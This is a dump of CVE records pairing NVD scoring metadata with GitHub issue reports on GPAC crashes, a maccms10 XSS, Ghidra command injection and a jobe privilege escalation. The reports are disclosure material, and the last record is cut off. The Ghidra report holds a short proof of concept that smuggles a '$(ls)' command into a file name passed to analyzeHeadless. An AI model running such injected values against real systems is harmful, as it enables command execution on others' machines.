https://github.com/gpac/gpac/issues/2359
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
- [X] I looked for a similar issue and couldn't find any. - [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, # Description segment fault (/stack overflow) due to infinite recursion in Media_GetSample isomedia/media.c:662 # Version info latest version atm ``` MP4Box - GPAC version 2.1-DEV-rev649-ga8f438d20-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` # Reproduce compile and run ``` ./configure --enable-sanitizer make ./MP4Box import -cat poc_segfault2.mp4 ``` Crash reported by sanitizer ``` [HEVC] Error parsing NAL unit type 63 Track Importing L-HEVC - Width 1 Height 6 FPS 25000/1000 [HEVC] NAL Unit type 26 not handled - adding [HEVC] xPS changed but could not flush frames before signaling state change ! [HEVC] Error parsing NAL unit type 33 [HEVC] Error parsing NAL unit type 32 [HEVC] Invalid log2_max_pic_order_cnt_lsb_minus4 80, max shall be 12 [HEVC] Error parsing NAL unit type 33 [HEVC] Error parsing Sequence Param Set [HEVC] Error parsing NAL unit type 34 [HEVC] Error parsing NAL unit type 0 [HEVC] Error parsing NAL unit type 32 [HEVC] Error parsing NAL unit type 32 HEVC Import results: 7 samples (39 NALUs) - Slices: 0 I 0 P 1 B - 0 SEI - 0 IDR - 0 CRA HEVC L-HEVC Import results: Slices: 3 I 0 P 2 B HEVC Stream uses forward prediction - stream CTS offset: 6 frames HEVC Max NALU size is 106 - stream could be optimized by setting nal_length=1 Appending file /home/sumuchuan/Desktop/gpac_fuzz/cat_gpac/bin/gcc/out/default/crashes/160.mp4 No suitable destination track found - creating new one (type vide) AddressSanitizer:DEADLYSIGNAL | (57/100) ================================================================= ==738673==ERROR: AddressSanitizer: stack-overflow on address 0x7ffdae782bc0 (pc 0x7f415d384491 bp 0x7ffdae783400 sp 0x7ffdae782bc0 T0) #0 0x7f415d384491 in __sanitizer::StackTrace::StackTrace(unsigned long const*, unsigned int) ../../../../src/libsanitizer/sanitizer_common/sanitizer_stacktrace.h:52 #1 0x7f415d384491 in __sanitizer::BufferedStackTrace::BufferedStackTrace() ../../../../src/libsanitizer/sanitizer_common/sanitizer_stacktrace.h:105 #2 0x7f415d384491 in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:127 #3 0x7f415787f858 in __GI__IO_free_backup_area libio/genops.c:190 #4 0x7f415787cae3 in _IO_new_file_seekoff libio/fileops.c:975 #5 0x7f415787ad52 in __fseeko libio/fseeko.c:40 #6 0x7f4159a1536a in BS_SeekIntern utils/bitstream.c:1338 #7 0x7f4159a1536a in gf_bs_seek utils/bitstream.c:1373 #8 0x7f4159fbbfc9 in gf_isom_fdm_get_data isomedia/data_map.c:501 #9 0x7f4159fbbfc9 in gf_isom_datamap_get_data isomedia/data_map.c:279 #10 0x7f415a0a1f40 in Media_GetSample isomedia/media.c:641 #11 0x7f4159ffc579 in gf_isom_get_sample_ex isomedia/isom_read.c:1916 #12 0x7f4159ec91ca in gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454 #13 0x7f415a0a305a in Media_GetSample isomedia/media.c:662 #14 0x7f4159ffc579 in gf_isom_get_sample_ex isomedia/isom_read.c:1916 #15 0x7f4159ec91ca in gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454 #16 0x7f415a0a305a in Media_GetSample isomedia/media.c:662 #17 0x7f4159ffc579 in gf_isom_get_sample_ex isomedia/isom_read.c:1916 #18 0x7f4159ec91ca in gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454 #19 0x7f415a0a305a in Media_GetSample isomedia/media.c:662 #20 0x7f4159ffc579 in gf_isom_get_sample_ex isomedia/isom_read.c:1916 #21 0x7f4159ec91ca in gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454 #22 0x7f415a0a305a in Media_GetSample isomedia/media.c:662 #23 0x7f4159ffc579 in gf_isom_get_sample_ex isomedia/isom_read.c:1916 #24 0x7f4159ec91ca in gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454 ... ``` looks like an infinite recursion ``` Media_GetSample isomedia/media.c:662 -> gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454 -> gf_isom_get_sample_ex isomedia/isom_read.c:1916 -> Media_GetSample isomedia/media.c:662 ``` if compile without ASAN and run the same poc ``` ./configure --static-bin make ./MP4Box import -cat poc_segfault2.mp4 ``` there will be a segment fault ``` [HEVC] Error parsing NAL unit type 63 Track Importing L-HEVC - Width 1 Height 6 FPS 25000/1000 [HEVC] NAL Unit type 26 not handled - adding [HEVC] xPS changed but could not flush frames before signaling state change ! [HEVC] Error parsing NAL unit type 33 [HEVC] Error parsing NAL unit type 32 [HEVC] Invalid log2_max_pic_order_cnt_lsb_minus4 80, max shall be 12 [HEVC] Error parsing NAL unit type 33 [HEVC] Error parsing Sequence Param Set [HEVC] Error parsing NAL unit type 34 [HEVC] Error parsing NAL unit type 0 [HEVC] Error parsing NAL unit type 32 [HEVC] Error parsing NAL unit type 32 HEVC Import results: 7 samples (39 NALUs) - Slices: 0 I 0 P 1 B - 0 SEI - 0 IDR - 0 CRA HEVC L-HEVC Import results: Slices: 3 I 0 P 2 B HEVC Stream uses forward prediction - stream CTS offset: 6 frames HEVC Max NALU size is 106 - stream could be optimized by setting nal_length=1 Appending file /home/sumuchuan/Desktop/gpac_fuzz/cat_gpac/bin/gcc/out/default/crashes/160.mp4 No suitable destination track found - creating new one (type vide) Segmentation fault===== | (57/100) ``` Because it ran out of stack space, making rsp and rbp point to an unmapped memory, causing seg fault. backtrace atm ``` pwndbg> bt ... #16487 0x000000000054d599 in gf_isom_get_sample_ex () #16488 0x0000000000521d6d in gf_isom_nalu_sample_rewrite () #16489 0x0000000000570e13 in Media_GetSample () #16490 0x000000000054d599 in gf_isom_get_sample_ex () #16491 0x0000000000521d6d in gf_isom_nalu_sample_rewrite () #16492 0x0000000000570e13 in Media_GetSample () #16493 0x000000000054d599 in gf_isom_get_sample_ex () #16494 0x0000000000521d6d in gf_isom_nalu_sample_rewrite () #16495 0x0000000000570e13 in Media_GetSample () ... ``` # POC [poc-segfault2.zip](https://github.com/gpac/gpac/files/10253557/poc-segfault2.zip) # Impact Potentially causing DoS # Credit Xdchase
Infinite recursion in Media_GetSample isomedia/media.c:662
https://api.github.com/repos/gpac/gpac/issues/2359/comments
0
2022-12-18T10:23:42Z
2022-12-19T11:26:12Z
https://github.com/gpac/gpac/issues/2359
1,501,850,761
2,359
4,596
CVE-2022-47663
2023-01-05T16:15:11.623
GPAC MP4box 2.1-DEV-rev649-ga8f438d20 is vulnerable to buffer overflow in h263dmx_process filters/reframe_h263.c:609
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2360" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2360" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/gpac/gpac/issues/2360
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
- [X] I looked for a similar issue and couldn't find any. - [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, # Description buffer overflow in h263dmx_process filters/reframe_h263.c:609 # Version info latest version atm ``` MP4Box - GPAC version 2.1-DEV-rev649-ga8f438d20-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` # Reproduce compile and run ``` ./configure --enable-sanitizer make ./MP4Box import -cat poc_bof13.mp4 ``` Crash reported by sanitizer ``` [H263Dmx] garbage before first frame! Track Importing H263 - Width 704 Height 576 FPS 15000/1000 ================================================================= ==735609==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60e000000620 at pc 0x7ff71222b397 bp 0x7ffeaf3c2280 sp 0x7ffeaf3c1a28 READ of size 4294967295 at 0x60e000000620 thread T0 #0 0x7ff71222b396 in __interceptor_memcpy ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827 #1 0x7ff70fbae101 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:29 #2 0x7ff70fbae101 in h263dmx_process filters/reframe_h263.c:609 #3 0x7ff70f7a6f1d in gf_filter_process_task filter_core/filter.c:2815 #4 0x7ff70f7665a3 in gf_fs_thread_proc filter_core/filter_session.c:1859 #5 0x7ff70f772ece in gf_fs_run filter_core/filter_session.c:2120 #6 0x7ff70f1b59c1 in gf_media_import media_tools/media_import.c:1551 #7 0x5617e36bfb4c in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498 #8 0x5617e36ca5d7 in cat_isomedia_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:2536 #9 0x5617e3674130 in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4562 #10 0x5617e3674130 in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124 #11 0x7ff70c73cd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58 #12 0x7ff70c73ce3f in __libc_start_main_impl ../csu/libc-start.c:392 #13 0x5617e3650cb4 in _start (/home/sumuchuan/Desktop/gpac_fuzz/gpac/bin/gcc/MP4Box+0xabcb4) 0x60e000000620 is located 0 bytes to the right of 160-byte region [0x60e000000580,0x60e000000620) allocated by thread T0 here: #0 0x7ff7122a5867 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145 #1 0x7ff70f7b4528 in gf_filter_parse_args filter_core/filter.c:2033 #2 0x7ff70f7b5234 in gf_filter_new_finalize filter_core/filter.c:510 #3 0x7ff70f7b65d7 in gf_filter_new filter_core/filter.c:439 #4 0x7ff70f7021c7 in gf_filter_pid_resolve_link_internal filter_core/filter_pid.c:3611 #5 0x7ff70f7258b2 in gf_filter_pid_resolve_link_check_loaded filter_core/filter_pid.c:3711 #6 0x7ff70f7258b2 in gf_filter_pid_init_task filter_core/filter_pid.c:4883 #7 0x7ff70f7665a3 in gf_fs_thread_proc filter_core/filter_session.c:1859 #8 0x7ff70f772ece in gf_fs_run filter_core/filter_session.c:2120 #9 0x7ff70f1b59c1 in gf_media_import media_tools/media_import.c:1551 #10 0x5617e36bfb4c in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498 #11 0x5617e36ca5d7 in cat_isomedia_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:2536 #12 0x5617e3674130 in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4562 #13 0x5617e3674130 in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124 #14 0x7ff70c73cd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827 in __interceptor_memcpy Shadow bytes around the buggy address: 0x0c1c7fff8070: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c1c7fff8080: 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa 0x0c1c7fff8090: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1c7fff80a0: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa 0x0c1c7fff80b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c1c7fff80c0: 00 00 00 00[fa]fa fa fa fa fa fa fa 00 00 00 00 0x0c1c7fff80d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1c7fff80e0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c1c7fff80f0: 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa 0x0c1c7fff8100: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1c7fff8110: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==735609==ABORTING ``` Looks like the oob read happens in filters/reframe_h263.c ``` READ of size 4294967295 at 0x60e000000620 thread T0 #0 0x7ff71222b396 in __interceptor_memcpy ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827 #1 0x7ff70fbae101 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:29 #2 0x7ff70fbae101 in h263dmx_process filters/reframe_h263.c:609 ``` if compile without ASAN and run the same poc ``` ./configure --static-bin make ./MP4Box import -cat poc_bof13.mp4 ``` there will be segment fault ``` [H263Dmx] garbage before first frame! Track Importing H263 - Width 704 Height 576 FPS 15000/1000 Segmentation fault= | (50/100) ``` backtrace atm ``` pwndbg> bt #0 0x0000000000afc1cc in __memmove_avx_unaligned_erms () #1 0x00000000007f0dbf in h263dmx_process () #2 0x00000000006d9c90 in gf_filter_process_task () #3 0x00000000006c5dbc in gf_fs_thread_proc () #4 0x00000000006cb3bb in gf_fs_run () #5 0x00000000006008ed in gf_media_import () #6 0x00000000004313d1 in import_file () #7 0x00000000004375f1 in cat_isomedia_file () #8 0x0000000000411e78 in mp4box_main () #9 0x0000000000a8c47a in __libc_start_call_main () #10 0x0000000000a8dcd7 in __libc_start_main_impl () #11 0x0000000000402c55 in _start () ``` # POC [poc_bof13.zip](https://github.com/gpac/gpac/files/10253538/poc_bof13.zip) # Impact Potentially causing DoS and RCE # Credit Xdchase
buffer overflow in h263dmx_process filters/reframe_h263.c:609
https://api.github.com/repos/gpac/gpac/issues/2360/comments
0
2022-12-18T10:23:45Z
2022-12-19T11:26:13Z
https://github.com/gpac/gpac/issues/2360
1,501,850,806
2,360
4,597
CVE-2022-44870
2023-01-06T03:15:08.143
A reflected cross-site scripting (XSS) vulnerability in maccms10 v2022.1000.3032 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter under the AD Management module.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Cedric1314/CVE-2022-44870/blob/main/README.md" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/magicblack/maccms10/issues/986" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Cedric1314/CVE-2022-44870/blob/main/README.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/magicblack/maccms10/issues/986" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2022.1000.3032:*:*:*:*:*:*", "matchCriteriaId": "820681B3-3CDE-4962-B67E-CE42CB193F48", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/magicblack/maccms10/issues/986
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "magicblack", "maccms10" ]
Go to background, go to Basics > AD Management > Name, Insert payload1 in the name box: It can cause XSS attacks. Vulnerability name:Reflective XSS Vulnerability level:Medium risk Affected version:v2021.1000.1081<= v2022.1000.3032 Vulnerability location: http://127.0.0.1/admin.php/admin/banner/infocat.html ![mac6](https://user-images.githubusercontent.com/42855430/199177971-515f1423-b9b6-4622-91ab-4bb8008ed30a.png) ![mac7](https://user-images.githubusercontent.com/42855430/199177999-d2620b9f-de34-4467-9436-9bad4792ed7a.png)
background XSS attacks
https://api.github.com/repos/magicblack/maccms10/issues/986/comments
0
2022-11-01T07:06:09Z
2022-11-01T09:06:08Z
https://github.com/magicblack/maccms10/issues/986
1,430,980,525
986
4,598
CVE-2023-22671
2023-01-06T07:15:08.583
Ghidra/RuntimeScripts/Linux/support/launch.sh in NSA Ghidra through 10.2.2 passes user-provided input into eval, leading to command injection when calling analyzeHeadless with untrusted input.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/NationalSecurityAgency/ghidra/issues/4869" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/NationalSecurityAgency/ghidra/pull/4872" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/NationalSecurityAgency/ghidra/issues/4869" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/NationalSecurityAgency/ghidra/pull/4872" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nsa:ghidra:*:*:*:*:*:*:*:*", "matchCriteriaId": "BA9D21C2-1C28-4DCD-9A54-E202E6E91774", "versionEndExcluding": null, "versionEndIncluding": "10.2.2", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "77" ]
77
https://github.com/NationalSecurityAgency/ghidra/issues/4869
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "NationalSecurityAgency", "ghidra" ]
**Describe the bug** `/Ghidra/RuntimeScripts/Linux/support/launch.sh` passes user provided input into `eval`. This results in straightforward command injection. There are a couple of security SaaS's that use `analyzeHeadless` as part of a service, so this is a pretty surprising RCE on natural-looking invocations. [https://github.com/NationalSecurityAgency/ghidra/blob/master/Ghidra/RuntimeScripts/Linux/support/launch.sh#L192](url) ``` if [ "${BACKGROUND}" = true ]; then eval "\"${JAVA_CMD}\" ${VMARG_LIST} -showversion -cp \"${CPATH}\" ghidra.Ghidra ${CLASSNAME} ${ARGS[@]}" &>/dev/null & # If our process dies immediately, output something so the user knows to run in debug mode. # Otherwise they'll never see any error output from background mode. # Doing a kill -0 sends a no-op signal, which can be used to see if the process is still alive. PID=$! sleep 1 if ! kill -0 ${PID} &>/dev/null; then echo "Exited with error. Run in foreground (fg) mode for more details." exit 1 fi exit 0 else eval "(set -o noglob; \"${JAVA_CMD}\" ${VMARG_LIST} -showversion -cp \"${CPATH}\" ghidra.Ghidra ${CLASSNAME} ${ARGS[@]})" exit $? fi ``` **To Reproduce** ``` import subprocess with open('/bin/bash', 'rb') as f: data = f.read() with open('./$(ls).bin', 'wb') as g: g.write(data) command = ['analyzeHeadless','./','poc','-import','./$(ls).bin'] subprocess.call(command, shell=False) ```
Command injection in launch.sh
https://api.github.com/repos/NationalSecurityAgency/ghidra/issues/4869/comments
1
2023-01-04T13:54:12Z
2023-01-10T10:09:19Z
https://github.com/NationalSecurityAgency/ghidra/issues/4869
1,519,020,081
4,869
4,599
CVE-2020-36642
2023-01-06T11:15:09.443
A vulnerability was found in trampgeek jobe up to 1.6.x and classified as critical. This issue affects the function run_in_sandbox of the file application/libraries/LanguageTask.php. The manipulation leads to command injection. Upgrading to version 1.7.0 is able to address this issue. The identifier of the patch is 8f43daf50c943b98eaf0c542da901a4a16e85b02. It is recommended to upgrade the affected component. The identifier VDB-217553 was assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 5.2, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 5.1, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "LOW", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.1, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/trampgeek/jobe/commit/8f43daf50c943b98eaf0c542da901a4a16e85b02" }, { "source": "cna@vuldb.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/trampgeek/jobe/issues/39" }, { "source": "cna@vuldb.com", "tags": [ "Release Notes" ], "url": "https://github.com/trampgeek/jobe/releases/tag/v1.7.0" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.217553" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?id.217553" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/trampgeek/jobe/commit/8f43daf50c943b98eaf0c542da901a4a16e85b02" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/trampgeek/jobe/issues/39" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes" ], "url": "https://github.com/trampgeek/jobe/releases/tag/v1.7.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.217553" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?id.217553" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jobe_project:jobe:*:*:*:*:*:*:*:*", "matchCriteriaId": "C5E85CFB-6C3C-43D7-A2FC-29B1AB822AA9", "versionEndExcluding": "1.7.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "77" ]
77
https://github.com/trampgeek/jobe/issues/39
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "trampgeek", "jobe" ]
Hello, i have found a bug that can lead to a privilege escalation. Most of the input which the user can control is escaped using **escapeshellarg** but using the cputime parameter which is not escaped you can create a command injection which leads to a privilege escalation. [Here](https://github.com/trampgeek/jobe/blob/9bd18bf1a1c72879dd6a02e19e745ce469c7eea5/application/libraries/LanguageTask.php#L278) you can see that cputime is not escaped and is directly set into the sandox command which is executed by the user www-data. Once you have access to the webroot you can patch runguard to accept root as a valid user and execute commands as root. I have also a proof-of-concept script but I won't upload it here for security reasons. If there are any further questions, I'll be happy to help. Sincerely, Marlon
Privilege escalation using cputime parameter and runguard
https://api.github.com/repos/trampgeek/jobe/issues/39/comments
2
2020-11-18T19:41:55Z
2020-11-20T06:33:26Z
https://github.com/trampgeek/jobe/issues/39
745,951,190
39
4,600
CVE-2019-25100
2023-01-08T11:15:10.130
A vulnerability was found in happyman twmap. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file twmap3/data/ajaxCRUD/pointdata2.php. The manipulation of the argument id leads to sql injection. Upgrading to version v2.9_v4.31 is able to address this issue. The identifier of the patch is babbec79b3fa4efb3bd581ea68af0528d11bba0c. It is recommended to upgrade the affected component. The identifier VDB-217645 was assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 5.2, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 5.1, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "LOW", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.1, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 